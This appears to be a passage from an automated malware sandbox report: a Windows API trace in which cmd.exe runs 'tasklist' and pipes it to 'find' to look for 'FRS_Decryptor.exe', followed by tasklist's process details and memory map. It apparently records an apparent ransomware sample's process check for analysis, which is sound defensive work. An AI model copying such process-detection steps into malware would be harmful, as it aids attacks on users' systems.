[0111.880] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0111.881] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.881] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.881] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0xffffffff [0111.881] GetLastError () returned 0x2 [0111.881] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.881] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0x825628 [0111.881] FindClose (in: hFindFile=0x825628 | out: hFindFile=0x825628) returned 1 [0111.881] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0xffffffff [0111.881] GetLastError () returned 0x2 [0111.881] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0x825628 [0111.881] FindClose (in: hFindFile=0x825628 | out: hFindFile=0x825628) returned 1 [0111.881] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0111.881] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0111.881] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0111.881] SetErrorMode (uMode=0x0) returned 0x0 [0111.881] SetErrorMode (uMode=0x1) returned 0x0 [0111.882] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x824668, lpFilePart=0x6cf91c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x6cf91c*="Desktop") returned 0x1c [0111.882] SetErrorMode (uMode=0x0) returned 0x1 [0111.882] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.882] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0111.882] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.882] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.882] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0xffffffff [0111.882] GetLastError () returned 0x2 [0111.882] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.882] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0x8204a0 [0111.882] FindClose (in: hFindFile=0x8204a0 | out: hFindFile=0x8204a0) returned 1 [0111.882] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0xffffffff [0111.883] GetLastError () returned 0x2 [0111.883] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0x8204a0 [0111.883] FindClose (in: hFindFile=0x8204a0 | out: hFindFile=0x8204a0) returned 1 [0111.883] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0111.883] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0111.883] GetConsoleTitleW (in: lpConsoleTitle=0x6cfba4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0111.883] InitializeProcThreadAttributeList (in: lpAttributeList=0x6cfad0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x6cfab4 | out: lpAttributeList=0x6cfad0, lpSize=0x6cfab4) returned 1 [0111.883] UpdateProcThreadAttribute (in: lpAttributeList=0x6cfad0, dwFlags=0x0, Attribute=0x60001, lpValue=0x6cfabc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6cfad0, lpPreviousValue=0x0) returned 1 [0111.883] GetStartupInfoW (in: lpStartupInfo=0x6cfb08 | out: lpStartupInfo=0x6cfb08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x24c, hStdError=0x2c)) [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.883] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0111.884] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0111.884] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0111.884] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x6cfa58*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6cfaa4 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x6cfaa4*(hProcess=0x60, hThread=0x54, dwProcessId=0x7f4, dwThreadId=0xb4c)) returned 1 [0111.886] CloseHandle (hObject=0x54) returned 1 [0111.886] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0111.886] GetEnvironmentStringsW () returned 0x82ad78* [0111.887] FreeEnvironmentStringsA (penv="=") returned 1 [0111.887] DeleteProcThreadAttributeList (in: lpAttributeList=0x6cfad0 | out: lpAttributeList=0x6cfad0) [0111.887] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0111.887] _close (_FileHandle=4) returned 0 [0111.887] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0112.329] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x6cfe18 | out: lpExitCode=0x6cfe18*=0x0) returned 1 [0112.329] CloseHandle (hObject=0x64) returned 1 [0112.329] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0112.331] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x6cfe18 | out: lpExitCode=0x6cfe18*=0x0) returned 1 [0112.331] CloseHandle (hObject=0x60) returned 1 [0112.331] _get_osfhandle (_FileHandle=1) returned 0x24c [0112.331] SetConsoleMode (hConsoleHandle=0x24c, dwMode=0x0) returned 0 [0112.331] _get_osfhandle (_FileHandle=1) returned 0x24c [0112.331] GetConsoleMode (in: hConsoleHandle=0x24c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0112.331] _get_osfhandle (_FileHandle=0) returned 0x24 [0112.331] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0112.332] SetConsoleInputExeNameW () returned 0x1 [0112.332] GetConsoleOutputCP () returned 0x1b5 [0112.332] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0112.332] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.332] exit (_Code=0) Process: id = "111" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x61847000" os_pid = "0x7d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "110" os_parent_pid = "0x9b0" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5718 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 5719 start_va = 0xfb0000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 5720 start_va = 0xfd0000 end_va = 0xfd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 5721 start_va = 0xfe0000 end_va = 0xfeefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 5722 start_va = 0xff0000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 5723 start_va = 0x1030000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 5724 start_va = 0x1070000 end_va = 0x1073fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 5725 start_va = 0x1080000 end_va = 0x1080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 5726 start_va = 0x1090000 end_va = 0x1091fff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 5727 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5728 start_va = 0x7eb60000 end_va = 0x7eb82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb60000" filename = "" Region: id = 5729 start_va = 0x7eb84000 end_va = 0x7eb84fff entry_point = 0x0 region_type = private name = "private_0x000000007eb84000" filename = "" Region: id = 5730 start_va = 0x7eb88000 end_va = 0x7eb88fff entry_point = 0x0 region_type = private name = "private_0x000000007eb88000" filename = "" Region: id = 5731 start_va = 0x7eb8d000 end_va = 0x7eb8ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb8d000" filename = "" Region: id = 5732 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5733 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5734 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5735 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5755 start_va = 0x1140000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 5756 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5757 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5758 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5763 start_va = 0xfb0000 end_va = 0xfbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 5764 start_va = 0xfc0000 end_va = 0xfc3fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 5765 start_va = 0xfd0000 end_va = 0xfd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 5766 start_va = 0x10a0000 end_va = 0x111dfff entry_point = 0x10a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5767 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 5768 start_va = 0x1130000 end_va = 0x1130fff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 5769 start_va = 0x1150000 end_va = 0x12d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 5770 start_va = 0x12e0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 5771 start_va = 0x12f0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 5772 start_va = 0x13f0000 end_va = 0x1570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013f0000" filename = "" Region: id = 5773 start_va = 0x1580000 end_va = 0x297ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001580000" filename = "" Region: id = 5774 start_va = 0x2980000 end_va = 0x2ac1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002980000" filename = "" Region: id = 5775 start_va = 0x2ad0000 end_va = 0x2ad0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 5776 start_va = 0x2ae0000 end_va = 0x2db4fff entry_point = 0x2ae0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5777 start_va = 0x2dc0000 end_va = 0x2dc3fff entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 5778 start_va = 0x2dd0000 end_va = 0x31cbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002dd0000" filename = "" Region: id = 5779 start_va = 0x31d0000 end_va = 0x31d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031d0000" filename = "" Region: id = 5780 start_va = 0x31e0000 end_va = 0x31e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031e0000" filename = "" Region: id = 5781 start_va = 0x31f0000 end_va = 0x322ffff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 5782 start_va = 0x3230000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 5783 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5784 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5785 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5786 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5787 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5788 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5789 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5790 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 5791 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5792 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5793 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 5794 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5795 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5796 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5797 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5798 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5799 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5800 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5801 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5802 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5803 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5804 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5805 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5806 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5807 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5808 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5809 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5810 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5811 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5812 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5813 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5814 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5815 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5816 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5817 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5818 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5819 start_va = 0x7ea60000 end_va = 0x7eb5ffff entry_point = 0x0 region_type = pagefile_backed name 